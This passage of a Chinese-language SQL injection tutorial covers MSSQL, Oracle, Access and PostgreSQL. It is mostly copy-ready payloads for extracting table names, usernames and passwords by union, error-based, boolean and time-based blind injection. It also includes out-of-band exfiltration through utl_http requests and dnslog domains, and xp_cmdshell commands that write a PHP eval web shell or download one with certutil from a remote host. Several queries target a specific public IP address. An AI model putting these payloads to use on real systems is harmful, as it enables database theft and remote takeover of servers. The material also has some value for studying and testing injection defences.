    AND UNICODE(SUBSTRING((SELECT TOP 1 ISNULL(CAST(test..sysusers.name+CHAR(46)+test..sysobjects.name AS NVARCHAR(4000)),CHAR(32)) FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) AND test..sysusers.name+CHAR(46)+test..sysobjects.name NOT IN (SELECT TOP 2 test..sysusers.name+CHAR(46)+test..sysobjects.name FROM test..sysobjects INNER JOIN test..sysusers ON test..sysobjects.uid = test..sysusers.uid WHERE test..sysobjects.xtype IN (CHAR(117),CHAR(118)) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name) ORDER BY test..sysusers.name+CHAR(46)+test..sysobjects.name),3,1))>N

    爆破test数据库中user表的字段数

    and (select count(name) from test..syscolumns where id=(select id from test..sysobjects where name='users'))=3  #正常显示

    所以users表有3个字段

    爆破test数据库中users表的字段名

    爆破test数据库中user表的第一个字段名的长度

    and len((select top 1 col_name(object_id('users'),1) from test..sysobjects))>1  正常显示

    and len((select top 1 col_name(object_id('users'),1) from test..sysobjects))>2  不正常显示

    所以users表的第一个字段名长度为2

    爆破test数据库中user表的第一个字段的第一个字符的ascii值,二分法

    and ascii(substring((select top 1 col_name(object_id('users'),1) from test..sysobjects),1,1))>N

    爆破test数据库中user表的第一个字段的第二个字符的ascii值:

    and ascii(substring((select top 1 col_name(object_id('users'),1) from test..sysobjects),2,1))>N

    ........

    最后得到第一个字段为:id

    爆破test数据库中user表的第二个字段名的长度

    and len((select top 1 col_name(object_id('users'),2) from test..sysobjects))>N

    爆破test数据库中user表的第二个字段的第一个字符的ascii值:

    and ascii(substring((select top 1 col_name(object_id('users'),2) from test..sysobjects),1,1))>N

    爆破test数据库中user表的第二个字段的第二个字符的ascii值:

    and ascii(substring((select top 1 col_name(object_id('users'),2) from test..sysobjects),2,1))>N

    爆破test数据库中user表的第三个字段的第三个字符的ascii值:

    and ascii(substring((select top 1 col_name(object_id('users'),2) from test..sysobjects),3,1))>N

    爆破test数据库中user表的第三个字段名的长度

    and len((select top 1 col_name(object_id('users'),3) from test..sysobjects))>N

    ........

    这里假设我们爆出了users表的三个字段名:id,username,password

    爆test数据库user表中数据总条数

    and (select count(*) from test..users)=N

    由图可知只有四条数据

    爆破test数据库中user表中password列中的数据

    这里爆破数据的时候,不能爆破数据的长度,所以只能爆破数据的一个一个字符。当爆破到第某个字符出现其ascii值>0都不正常显示时,说明这个字符位不存在,所以到前一位为止。

    爆破test数据库中users表中password列中第一行数据的第一个字符的ascii值

    and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),1,1))>N

    爆破test数据库中user表中password列中第一行数据的第二个字符的ascii

    and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),2,1))>N

    爆破test数据库中user表中password列中第一行数据的第三个字符的ascii

    and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),3,1))>N

    爆破test数据库中user表中password列中第一行数据的第四个字符的ascii

    and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=1),4,1))>N

    当爆破到第5个字符的时候,发现ascii>0都不正常显示,说明,第一个数据长度为4

    最后爆出test数据库userspassword列的第一条数据是:root

    爆破test数据库中user表中password列中第二行数据的第一个字符的ascii

    and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=2),1,1))>N

    爆破test数据库中user表中password列中第二行数据的第二个字符的ascii

    and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=2),2,1))>N

    爆破test数据库中user表中password列中第二行数据的第三个字符的ascii

    and unicode(substring((select isnull(cast(password as nvarchar(4000)),char(32)) from(select password, row_number() over (order by (select 1)) as limit from test.dbo.users)x where limit=2),3,1))>N

    ........

    延时注入

    判断是否是SA权限

    if(1=(select is_srvrolemember('sysadmin'))) WAITFOR DELAY '0:0:2'

    判断是否是站库分离(延时后返回正确页面,确定站库没有分离)

    if(host_name()=@@servername) WAITFOR DELAY '0:0:2'

    判断数据库的个数

    IF(UNICODE(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases),1,1))=55) WAITFOR DELAY '0:0:2'

    判断是否开启xp_cmdshell

    if(1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')) WAITFOR DELAY '0:0:2'--

    更多延时注入payload,可

    以查看sqlmap

    根据响应时间判断执行是否正确

    Union联合查询

    首先order by查看有几列

    1 order by 3  正常显示

    1 order by 4  不正常显示

    说明有3列

    然后我们可以select NULL,NULL,想查询的数据

    查询数据库版本 

    查询所有数据库名

    SQLServer获取权限的奇淫技巧

    利用前提:

    1. 目标网站注入支持堆叠注入
    2. 当前权限是SA权限
    3. 使用sqlmap的 –os-shell 无法获取到权限

    这里很多人就会问了,既然是SA权限,不是可以直接利用xp_cmdshell执行系统命令吗?对,没错,但是你使用xp_cmdshell执行的命令没有回显。我们这个获取权限的思路就是,找到目标网站的绝对路径,然后往绝对路径下写入木马,然后获取权限。

    我们这里是通过先找到目标网站的一个文件,然后通过遍历目标服务器的磁盘,找到该文件,将其路径写入自建的表中,然后再读取该表得到网站绝对路径。

    这里利用的查找命令是:

    查找目标机器C盘下的test.txt文件

    for /r c:\ %i in (test*.txt) do @echo %i   #这里的文件名后缀前那个点一定要加*

    dir /s /b c:\test.txt

    这里假设我们已经知道目标网站下有一个test.txt文件,

    创建表hack,并添加一个tmp的字段

    create table hack (tmp varchar(1000));--  

    查看表是否创建成功:

    python2 sqlmap.py -u http://192.168.10.20:88/index.php?id=1 -D test –tables

    查找目标机器C盘下的test.txt路径,并将结果写入刚刚创建的hack表的tmp字段

    ;insert into hack(tmp) exec master..xp_cmdshell 'dir /s /b c:\test.txt';--

    ;insert into hack(tmp) exec master..xp_cmdshell 'for /r c:\ %i in (test*.txt) do @echo %i';--

    以上两条语句均可

    读取数据,得到目标网站绝对路径为:C:\phpstudy\www

    python2 sqlmap.py -u http://192.168.10.20:88/index.php?id=1 -D test -T hack –dump

    将一句话木马写入目标网站根目录,并命名为shell.php。注意这里的一句话木马的 < 和 > 前要加上 ^

    1;exec master..xp_cmdshell 'echo ^<?php @eval($_POST[x]);?^> > C:\phpstudy\www\shell.php';--

    如果写入的木马文件连接不上的话,我们还可以通过下面手段使用 certutil 远程下载木马文件,前提是目标机器通公网

    1;exec master..xp_cmdshell 'certutil -urlcache -split -f http://x.x.x.x/shell.php C:\phpstudy\www\shell2.php';--

    连接下载的shell2.php木马即可!

    Oracle数据库注入

    注入点确定

    跟其他数据库一样,检测注入点都是可以通过拼接and语句进行判断。这里通过and 1=1 和and 1=2进行判断。实战中还可以通过延时函数进行判断。

    http://219.153.49.228:43469/new_list.php?id=1%20and%201=1

    http://219.153.49.228:43469/new_list.php?id=1%20and%201=2

    显错注入(union联合查询)

    1、判断字段数为2

    与其他注入一样,这里通过order by来判断字段数。因为order by 2页面正常,order by 3页面不正常,故判断当前字段数为2。

    http://219.153.49.228:43469/new_list.php?id=1%20order%20by%202


    2、获取显错点

    联合查询这里使用了union select,oracle数据库与mysql数据库不同点在于它对于字段点数据类型敏感,也就是说我们不能直接union select 1,2,3来获取显错点了,需要在字符型字段使用字符型数据,整型字段使用整型数据才可以。如下,两个字段都为字符型,故使用union select 'null','null'。

    (在有些情况下也采用union all select的形式进行联合查询。union all select与union select的不同点可以很容易理解为all表示输出所有,也就是当数据出现相同时,将所有数据都输出;union select则会将相同数据进行过滤,只输出其中一条。)

    #联合查询http://219.153.49.228:43469/new_list.php?id=-1 union select null,null from dual#修改null为'null',判断字段类型均为字符型http://219.153.49.228:43469/new_list.php?id=-1 union select 'null','null' from dual

    后续便可以替换显错点进行注入。

    3、查询数据库版本信息

    http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

    4、获取当前数据库连接用户

    http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select sys_context('userenv','current_user') from dual) from dual http://219.153.49.228:44768/new_list.php?id=-1 union select '1',user from dual

    5、查询当前数据库库名

    http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select instance_name from V$INSTANCE) from dual

    6、查询数据库表名

    查询表名一般查询admin或者user表

    直接查询

    获取第一个表名LOGMNR_SESSION_EVOLVE$

    http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1) from dual

    获取第二个表名LOGMNR_GLOBAL$:

    http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

    模糊搜索查询

    获取sns_users表名

    http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1) from dual

    7、查询数据库列名

    直接查询

    获取sns_users表里的字段

    http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1) from dualhttp://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME') from dualhttp://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME') from dual……http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where rownum=1 and column_name not in 'USER_NAME' and column_name not in 'AGENT_NAME' and column_name not in 'PROTOCOL' and column_name not in 'SPARE1' and column_name not in 'DB_USERNAME' and column_name not in 'OID' and column_name <> 'EVENTID' and column_name <> 'NAME' and column_name <> 'TABLE_OBJNO') from dual

    获取如下字段:USER_NAMEAGENT_NAMEPROTOCOLSPARE1DB_USERNAMEOIDEVENTIDNAMETABLE_OBJNOUSAGEUSER_PWD…………

    模糊搜索查询

    http://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dualhttp://219.153.49.228:43469/new_list.php?id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual

    8、查询数据库数据

    获取账号密码字段内容

    http://219.153.49.228:43469/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

    http://219.153.49.228:43469/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

    http://219.153.49.228:43469/new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

    9、美化输出

    Oracle采用||进行数据连接

    http://219.153.49.228:44768/new_list.php?id=-1 union select '用户名:'||USER_NAME,'密码:'||USER_PWD from "sns_users" where rownum=1

    报错注入

    报错注入是一种通过函数报错前进行子查询获取数据,再通过错误页面回显的一种注入手法,下面介绍几种报错注入函数以及获取一些常见的获取数据,实际操作只需要将子查询内的查询语句进行替换即可。

    1、ctxsys.drithsx.sn()

    #获取当前数据库用户 ORACLE1?id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --

    #获取数据库版本信息?id=1 and 1=ctxsys.drithsx.sn(1,(select banner from sys.v_$version where rownum=1)) --

    2、XMLType()

    ?id=1 and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --

    3、dbms_xdb_version.checkin()

    #获取数据库版本信息?id=1 and (select dbms_xdb_version.checkin((select banner from sys.v_$version where rownum=1)) from dual) is not null --

    4、bms_xdb_version.makeversioned()

    #获取当前数据库用户 ORACLE1?id=1 and (select dbms_xdb_version.makeversioned((select user from dual)) from dual) is not null --

    5、dbms_xdb_version.uncheckout()

    #获取数据库版本信息?id=1 and (select dbms_xdb_version.uncheckout((select banner from sys.v_$version where rownum=1)) from dual) is not null --

    6、dbms_utility.sqlid_to_sqlhash()

    #获取数据库版本信息?id=1 and (SELECT dbms_utility.sqlid_to_sqlhash((select banner from sys.v_$version where rownum=1)) from dual) is not null --

    7、ordsys.ord_dicom.getmappingxpath()

    ?id=1 and 1=ordsys.ord_dicom.getmappingxpath((select banner from sys.v_$version where rownum=1),user,user)--

    8、utl_inaddr.*()

    utl_inaddr(用于取得局域网或Internet环境中的主机名和IP地址)

    ?id=1 and 1=utl_inaddr.get_host_name((select user from dual)) –-?id=1 and 1=utl_inaddr.get_host_address((select user from dual)) --

    布尔型盲注

    常用猜解:

    #猜长度?id=1 and 6=(select length(user) from dual)#截取值猜ascii码?id=1 and (select ascii(substr(user,1,1)) from dual)>83

    decode函数布尔盲注

    decode(字段或字段的运算,值1,值2,值3)

    这个函数运行的结果是,当字段或字段的运算的值等于值1时,该函数返回值2,否则返回3

    测试用户名长度:

    http://219.153.49.228:44768/new_list.php?id=1 and 6=(select length(user) from dual) --

    测试当前用户是否为SYSTEM:

    #如果是system用户则返回正常,不是则返回不正常http://219.153.49.228:44768/new_list.php?id=1 and 1=(select decode(user,'SYSTEM',1,0) from dual) --#使用substr截断,逐个字段进行猜解http://219.153.49.228:44768/new_list.php?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) – ?id=1 and 1=(select decode(substr(user,2,1),'Y',1,0) from dual) – ?id=1 and 1=(select decode(substr(user,3,1),'S',1,0) from dual) –?id=1 and 1=(select decode(substr(user,4,1),'T',1,0) from dual) –?id=1 and 1=(select decode(substr(user,5,1),'E',1,0) from dual) –?id=1 and 1=(select decode(substr(user,6,1),'M',1,0) from dual) –#当然也可以配合ascii码进行猜解?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',1,0) from dual) --

    instr函数布尔盲注

    instr函数的应用:

    select instr('abcdefgh','de') position from dual;#返回结果:4

    盲注中的应用:

    http://219.153.49.228:44768/new_list.php?id=1 and 1=(instr((select user from dual),'SYS')) --?id=1 and 4=(instr((select user from dual),'T')) --

    延时盲注

    1、检测漏洞存在

    DBMS_PIPE.RECEIVE_MESSAGE函数的作用是从指定管道获取消息。

    具体用法为:DBMS_PIPE.RECEIVE_MESSAGE('pipename',timeout)

    pipename为varchar(128)的字符串,用以指定管道名称,在这里我们输入任意值即可。

    timeout为integer的可选输入参数,用来指定等待时间。

    常用payload如下:

    http://219.153.49.228:44768/new_list.php?id=1 and 1=dbms_pipe.receive_message('o', 10)--

    如果页面延时10秒返回,即存在注入。

    2、配合decode函数延时盲注

    只需要将延时语句放入decode函数中即可

    #直接猜解字符?id=1 and 1=(select decode(substr(user,1,1),'S',dbms_pipe.receive_message('o',5),0) from dual) --#通过ascii猜解字符?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',dbms_pipe.receive_message('o',5),0) from dual) --

    3、使用其他延时查询来判断

    如(select count(*) from all_objects) ,因为查询结果需要一定的时间,在无法使用dbms_pipe.receive_message()函数的情况下可以使用这个。具体操作只需要将decode()函数的返回结果进行替换即可。

    #直接猜解字符?id=1 and 1=(select decode(substr(user,1,1),'S',(select count(*) from all_objects),0) from dual) --#通过ascii猜解字符?id=1 and 1=(select decode(ascii(substr(user,1,1)),'83',(select count(*) from all_objects),0) from dual) --

    外带数据注入

    1、url_http.request()

    使用此方法,用户需要有utl_http访问网络的权限
    首先检测是否支持,页面返回正常则表示支持

    ?id=1 and exists (select count(*) from all_objects where object_name='UTL_HTTP') --

    然后python起一个http服务,或者开启nc监听。这里我使用python开启一个服务:

    python3 -m http.server 4455 #子查询数据库版本信息并访问python起的http服务?id=1 and utl_http.request('http://192.168.100.130:4455/'||(select banner from sys.v_$version where rownum=1))=1--#http访问时可以将||进行URL编码?id=1 and utl_http.request('http://192.168.100.130:4455/'%7C%7C(select banner from sys.v_$version where rownum=1))=1--

    可以看到成功获取了数据

    2、utl_inaddr.get_host_address()函数

    #使用dnslog外带数据?id=1 and (select utl_inaddr.get_host_address((select user from dual)||'.eeaijt.dnslog.cn') from dual)is not null --

    3、SYS.DBMS_LDAP.INIT()函数

    ?id=1 and (select SYS.DBMS_LDAP.INIT((select user from dual)||'.51prg6.dnslog.cn',80) from dual)is not null --?id=1 and (select DBMS_LDAP.INIT((select user from dual)||'.51prg6.dnslog.cn',80) from dual)is not null --

    4、HTTPURITYPE()函数

    ?id=1 and (select HTTPURITYPE('http://192.168.100.130:4455/'||(select user from dual)).GETCLOB() FROM DUAL)is not null --

    同样需要python起一个http服务,或者nc创建监听

    虽然访问404,但是同样成功外带数据。

    getshell

    待补充

    Access数据库注入

    在Office 2007之前的Access数据库文件的后缀是 .mdb ,Office2007及其之后的Access数据库文件的后缀是 .accdb 。

    Access数据库属于文件型数据库,所以不需要端口号。

    Access数据库中没有注释符号.因此  /**/   、 --   和   #   都没法使用。

    Access是小型数据库,当容量到达100M左右的时候性能就会开始下降。

    Access数据库不支持错误显示注入,Access数据库不能执行系统命令。

    Access没有数据库的概念,所有的表都是在同一个数据库下。

    显错注入(union联合查询)

    只需要先找到注入点,通过order by进行字段判断,再使用可控输入对目标数据库进行联合注入即可,本质上和MySQL的联合注入差不多,不过它没有information_schema库,需要猜解它的表名和列名,如果猜对了就会在网页上回显。可以将以下常用的表名和列名进行猜解:

    常见的表名:

    admin,a_admin,x_admin,m_admin,adminuser,admin_user,article_admin,administrator,manage,manager,member,memberlist,user,users,Manage_User,user_info,admin_userinfo,UserGroups,user_list,login,用户,Friend,zl,movie,news,password,clubconfig,config,company,book,art,dv_admin,userinfo

    常见的列名:

    username,adminusername,admin_username,adminname,admin_name,admin,adminuser,admin_user,usrname,usr_name,user_admin,password,admin_password,administrator,administrators,adminpassword,adminpwd,admin_pwd,adminpass,admin_pass,usrpass,usr_pass,user,name,pass,userpass,user_pass,userpassword,user_password,pwd,userpwd,user_pwd,useradmin,pword,p_word,pass-wd,yonghu,用户,用户名,密码,帐号,id,uid,userid,user_id,adminid,admin_id,login_name

    猜解方式

    猜测表名:

    使用 exists 关键字:
    判断存在sql注入后,判断是否存在admin表,如果存在,正常查询,如果不存在,报语法错误。然后通过枚举表名爆破

    and exists(select * from  admin)

    猜测列名也是一样,只能通过枚举来猜测

    判断有admin表后,再判断admin表有多少列,假如1-10正常查询,11列报语法报错,那说明有10列

    and exists(select * from admin order by 10)

    判断出存在的列数后,再判断具体的列名。以下语句判断是否存在name列,如果存在,正常查询,如果不存在,则报语法错误。然后再通过枚举列名爆破

    and exists(select name from admin)

    布尔盲注

    前面几步和显错注入类似。

    常用函数

    select len("string")        查询给定字符串的长度

    select asc("a")             查询给定字符串的ascii值

    top  n                      查询前n条记录

    select mid("string",2,1)    查询给定字符串从指定索引开始的长度

    通过布尔盲注获取数据:

    access数据库中没有 limit,就不能限制查询出来的行数。但是我们可以使用top命令,top 1是将查询的所有数据只显示第一行,所以 top3就是显示查询出来的前三行数据了
    猜测admin列的第一个数据的长度,如果大于5查询不出数据,大于4正常,说明admin列的第一个数据长度是5

    and (select top 1 len(admin)from admin)>5

    猜测admin列的第一行数据的第一个字符的ascii码值,如果大于97查询不出数据,大于96正常,说明admin列的第一行数据的第一个字符的ascii值是97

    and (select top 1 asc(mid(admin,1,1))from admin)>97

    第一行数据的第二个字符

    and (select top 1 asc(mid(admin,2,1))from admin)>97

     

    从第二行开始,查询数据就得用另外的语句了,因为这里的top只能显示查询前几条数据,所以我们得用联合查询,先查询前两条,然后倒序,然后在找出第一条,这就是第二条数据。

    查询第二行admin列的长度

    and (select top 1 len(admin)  from ( select top 2 * from information order by id)  order by id desc)>55

    下面是查询第2条数据的第3个字符

    and (select top 1 asc(mid(admin,3,1))  from ( select top 2 * from information order by id)  order by id desc)>55

    查询第三条数据的4个字符

    and (select top 1 asc(mid(admin,4,1))  from ( select top 3 * from information order by id)  order by id desc)>55

     

     

    PostgreSQL数据库注入

    PostgreSQL是一种特性非常齐全的自由软件的对象-关系型数据库管理系统(ORDBMS),4.2版本为基础的对象关系型数据库管理系统。

    PostgreSQL安装后,默认的端口是:5432,默认的用户名是: postgres ,默认的数据库也是:postgres 。

    注释符:--            

    延时函数:pg_sleep(3)

    PostgreSQL和MySQL一样,也有 information_schema 数据库。

    常用命令

    select CURRENT_SCHEMA()           #查看当前权限

    select user                       #查看用户

    select current_user               #查看当前用户

    select chr(97)                    #ASCII码转为字符

    select chr(97)||chr(100)||chr(109)||chr(105)||chr(110)  #ASCII转换为字符串

    SELECT session_user;

    SELECT usename FROM pg_user;

    SELECT getpgusername();

    select version()                  #查看PostgreSQL数据库版本

    SELECT current_database()         #查看当前数据库

    select length('admin')            #查看长度

    select case when(expr1) then result1 else result2 end;  #如果xx,执行result1,否则result2

    例:select case when(current_user='postgres') then pg_sleep(5) else pg_sleep(0) end;

    select pg_read_file("/etc/passwd");          #读取文件

    select system("whoami");                     #执行系统命令,11.2以下才有该命令

    COPY (select '<?php phpinfo();?>') to '/tmp/1.php';   #写入文件

    || 拼接字符串

    DISTINCT 过滤重复

    CAST 类型转换   cast ('1' as numeric)    1转换为数字类型

    1::text                数据类型转换为text类型

    Numeric(10,2)          指字段是数字型,长度为10 小数为两位的

    case...when...then...else...end  条件语句

    COALESCE(expr1,expr2…..)     返回列表中第一个非null的值,如果列表中所有的值都是null则返回null。

    显错注入(union联合查询)

    order by 3   #查看显示列

    select null,null,函数

    然后接下来就是和MySQL注入一样了,关于PostgreSQL的语句可以查看SQLMap

    获取模式名称(schemaname)名称

    参考Sqlmap    ?uid=1 UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM pg_tables简化:    ?uid=1 UNION SELECT NULL,COALESCE(CAST(schemaname AS CHARACTER(10000)),(CHR(32))),NULL FROM pg_tables--    语法解析:    COALESCE(expression[,n])    coalesce函数返回参数(列名)中第一个非NULL值的字段值,注意不是为空''    cast ('1' as numeric)         1转换为数字类型简化:    ?uid=1 UNION SELECT NULL,schemaname,NULL FROM pg_tables--

    用户创建的数据库默认模式名称(schemaname)为public

    获取数据表名称

    参考Sqlmap    ?uid=1 UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(tablename AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM pg_tables WHERE schemaname IN ((CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99)))简化:    uid=1 UNION ALL SELECT NULL,tablename,NULL FROM pg_tables WHERE schemaname IN ('public')

    获取表字段名称

    参考Sqlmap    ?uid=1 UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(attname AS CHARACTER(10000)),(CHR(32)))||(CHR(106)||CHR(115)||CHR(97)||CHR(110)||CHR(101)||CHR(117))||COALESCE(CAST(typname AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname=(CHR(116)||CHR(98)||CHR(117)||CHR(115)||CHR(101)||CHR(114)) AND nspname=(CHR(112)||CHR(117)||CHR(98)||CHR(108)||CHR(105)||CHR(99))--简化:    ?uid=1 UNION SELECT NULL,attname,NULL FROM pg_namespace,pg_type,pg_attribute b JOIN pg_class a ON a.oid=b.attrelid WHERE a.relnamespace=pg_namespace.oid AND pg_type.oid=b.atttypid AND attnum>0 AND a.relname='tbuser' AND nspname='public'--

    获取表内容

    参考Sqlmap    UNION ALL SELECT NULL,(CHR(113)||CHR(106)||CHR(112)||CHR(113)||CHR(113))||COALESCE(CAST(id AS CHARACTER(10000)),(CHR(32)))||(CHR(106)||CHR(115)||CHR(97)||CHR(110)||CHR(101)||CHR(117))||COALESCE(CAST(passwd AS CHARACTER(10000)),(CHR(32)))||(CHR(106)||CHR(115)||CHR(97)||CHR(110)||CHR(101)||CHR(117))||COALESCE(CAST(username AS CHARACTER(10000)),(CHR(32)))||(CHR(113)||CHR(120)||CHR(113)||CHR(122)||CHR(113)),NULL FROM public.tbuser--简化:    ?uid=1 UNION ALL SELECT NULL,COALESCE(CAST(id AS CHARACTER(10000)),(CHR(32)))||COALESCE(CAST(username AS CHARACTER(10000)),(CHR(32)))||COALESCE(CAST(passwd AS CHARACTER(10000)),(CHR(32))),NULL FROM public.tbuser--简化整理:    ?uid=1 UNION ALL SELECT NULL,id||','||username||','||passwd,NULL FROM public.tbuser--

    报错注入

    参考Sqlmap

        uid=1 AND 7778=CAST((CHR(113)||CHR(98)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (7778=7778) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(118)||CHR(112)||CHR(106)||CHR(113)) AS NUMERIC)

    语法解析:

        cast ('1' as numeric)    1转换为数字类型

        Numeric(10,2)          指字段是数字型,长度为10 小数为两位的

        1::text                数据类型转换为text类型

        case...when...then...else...end  条件语句

    获取版本号:

        select * from tbuser  where id=1 AND 7778=CAST((SELECT version())::text AS NUMERIC)

    获取Schemas名称:

        select * from tbuser  where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables limit 1)::text AS NUMERIC)

        select * from tbuser  where id=1 AND 7778=CAST((SELECT schemaname FROM pg_tables where schemaname not in ('public') limit 1)::text AS NUMERIC)

    时间盲注

    select pg_sleep(3)

    1、SELECT CASE WHEN (length(current_database())=6) THEN pg_sleep(3) ELSE pg_sleep(0) END  --+      #猜解数据库长度

    2、SELECT CASE WHEN (COALESCE(ASCII(SUBSTR((CURRENT_SCHEMA()),0,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+   #猜解数据库名称

    3、SELECT CASE WHEN (length(current_user)=6) THEN pg_sleep(3) ELSE pg_sleep(0) END  --+   #猜解当前用户长度

    4、SELECT CASE WHEN (COALESCE(ASCII(SUBSTR((current_user),1,1)),0) > 100) THEN pg_sleep(14) ELSE pg_sleep(0) END LIMIT 1--+   #逐位猜解用户

    布尔盲注

    1 AND ASCII(SUBSTRING((SELECT COALESCE(CAST(COUNT(DISTINCT(schemaname)) AS CHARACTER(10000)),(CHR(32))) FROM pg_tables)::text FROM 1 FOR 1))>48

    堆叠查询

    和MySQL的堆叠注入一样,在后面加上查询语句即可。

    其他

    1)读取文件:

    select pg_read_file(filepath+filename);

    (2)执行命令:

    select system("comamnd_string");

    (3)写入文件:

    COPY (select '<?php phpinfo();?>') to '/tmp/1.php';

    参考

    MySQL:https://xz.aliyun.com/t/7169

    SQL Server : https://www.anquanke.com/post/id/200154

    Oracle : https://xz.aliyun.com/t/9940

    Access : https://www.freebuf.com/articles/web/284283.html

    https://blog.csdn.net/qq_36119192/article/details/86468579

    PostgreSQL: https://www.jianshu.com/p/ba0297da2c2e

    https://blog.csdn.net/qq_36119192/article/details/104628797 

  • 相关阅读:
    LightOj1054
    LightOj1028
    Docker仓库(转载)
    Dockerfile(转载)
    Docker存储卷(转载)
    容器虚拟化网络和Docker容器网络(转载)
    Docker镜像管理基础(转载)
    Docker基础用法(转载)
    docker容器技术基础入门(转载)
    Redis 3种安装部署方式
  • 原文地址:https://www.cnblogs.com/yokan/p/15456374.html
Copyright © 2020-2023  润新知